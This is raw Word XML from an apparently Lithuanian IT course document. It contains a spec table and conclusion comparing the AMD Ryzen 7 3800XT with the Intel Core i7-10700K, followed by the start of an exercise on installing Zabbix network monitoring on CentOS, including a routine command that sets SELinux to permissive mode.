              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>TPD lygis</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2B33C557" w14:textId="65E55A21"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105W</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18549641" w14:textId="1355D122"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125 W</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="45F1B0CD" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5A5053A4" w14:textId="0F4519BD" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Išleidimo metai į rinką</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="31F606E8" w14:textId="6B7E8BD6"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Q2'19 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="27291D1D" w14:textId="3AF13897"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Q2'20</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="205CDA60" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="27CF05FF" w14:textId="0EAE6120" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Passsmark našumo bal</w:t>
            </w:r>
            <w:r w:rsidR="00E643C6" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>as</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="767A7F84" w14:textId="39317DEA"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23967 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="71EDB49A" w14:textId="259F62A6"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 xml:space="preserve">19595 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6BE8841C" w14:textId="77777777" w:rsidTr="23C33711">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1693" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5D7056B5" w14:textId="5F85181D" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kaina</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1627" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5A083CA5" w14:textId="28883057" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$370.00 - $406.00</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6CBCDB3D" w14:textId="789DD934" w:rsidR="19503364" w:rsidRPr="005A5C28" w:rsidRDefault="54F44185" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>$374.00 - $387.00</w:t>
            </w:r>
            <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69DBB890" w14:textId="7DE92A08" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="65953A9B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Išvados. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Remiant</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>s surinkta informacija apie d</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> procesorius</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> galima daryti išvadą, kad</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pagal gaminimo technologiją AMD Ryzen 7 3800XT lenkia INTEL Core i7-10700K TSMC 7nm FinFET prieš Intel 14+++ nm</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Be to,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>AMD Ryzen 7 lenkia pagal bazinį taktinį visų branduolių dažnį 3.9GHz prieš 3.80 GHz ir atsilieka pagal vieną branduolį Turbo Boost režime 4.5GHz prieš 5.10 GHz. AMD proce</w:t>
      </w:r>
      <w:r w:rsidR="00C31EC6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sor</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ius taip lenkia pagal spartinančiosios atminties kiekį L3, t.y. 32MB prieš 16MB. Pagal TPD lyg</w:t>
      </w:r>
      <w:r w:rsidR="1CA2AD5E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> AMD irgi lenkia</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>INTEL 105W ir 125W. AMD palaiko PCIe 4.0 x16, o INTEL tik PCIe 3.0 x16, tai reiškia, kad jei nauj</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vaizdo plokštė irgi palaiko naują standartą, tai duomenų perdavimo sparta bus didesnė, nei</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>PCIe 3.0 x16. Jei lygin</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ame</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">pagal bendrą našumo passmark balą, tai matome, kad ir čia AMD lenkia INTEL 23967 </w:t>
      </w:r>
      <w:r w:rsidR="2FB65256" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 19595.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kainos abiejų procesorių yra panašios.</w:t>
      </w:r>
      <w:r w:rsidR="0DB0C4E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Taigi</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">lyginant </w:t>
      </w:r>
      <w:r w:rsidR="0DB0C4E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">techninius parametrus </w:t>
      </w:r>
      <w:r w:rsidR="6BCCC5E7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir passmark našumo balą</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0DB0C4E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">AMD procesorius </w:t>
      </w:r>
      <w:r w:rsidR="675002E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ryzen 7 3800XT</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="675002E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>yra geresnis negu INTEL Core i7-10700K</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>, nors jų kaina ta pati</w:t>
      </w:r>
      <w:r w:rsidR="675002E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614145FA" w14:textId="6901756C" w:rsidR="003A32C0" w:rsidRPr="005A5C28" w:rsidRDefault="003A32C0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17977277" w14:textId="77777777" w:rsidR="00E643C6" w:rsidRPr="005A5C28" w:rsidRDefault="00E643C6"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7 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ĮDIEGTI IR KONFIGŪRUOTI ĮRANKIUS TINKLO BŪSENAI STEBĖTI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39216C42" w14:textId="624A292E" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="00DC0673" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">LAUKIAMI </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>REZULTATAI</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>okinys turi pateikti įdiegtos virtualios mašinos (VirtualBox arba analogo), C</w:t>
      </w:r>
      <w:r w:rsidR="009E1730" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ent</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OS operacinės sistemos ir Zabbix programin</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> rinkin</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>io</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tinklo būsenai stebėti</w:t>
      </w:r>
      <w:r w:rsidR="00716104" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ekrano vaizdus</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Pateikti galutinio rezultato ekrano vaizdus</w:t>
      </w:r>
      <w:r w:rsidR="00E643C6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D779EB4" w14:textId="7E8D146D" w:rsidR="003F03A0" w:rsidRPr="005A5C28" w:rsidRDefault="003F03A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9E8239" w14:textId="6CABAC78" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Nustatykite „SELinux“</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>leistin</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> režim</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="003F03A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BEB0CD" w14:textId="6A162426" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="003F03A0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>onfigūruo</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>jame</w:t>
      </w:r>
      <w:r w:rsidR="7F3641C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> „SELinux“, kad jis veiktų leistinu režimu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB7130" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>setenforce 0 &amp;&amp; sed -i 's/^SELINUX=.*/SELINUX=permissive/g' /etc/selinux/config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C00EAF" w14:textId="5FEA7720" w:rsidR="007D6C3C" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Įdiekite „Zabbix“ serverį, sąsają ir agentą</w:t>
      </w:r>
      <w:r w:rsidR="00A408AF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D3BF86" w14:textId="77777777" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="7F3641C7" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
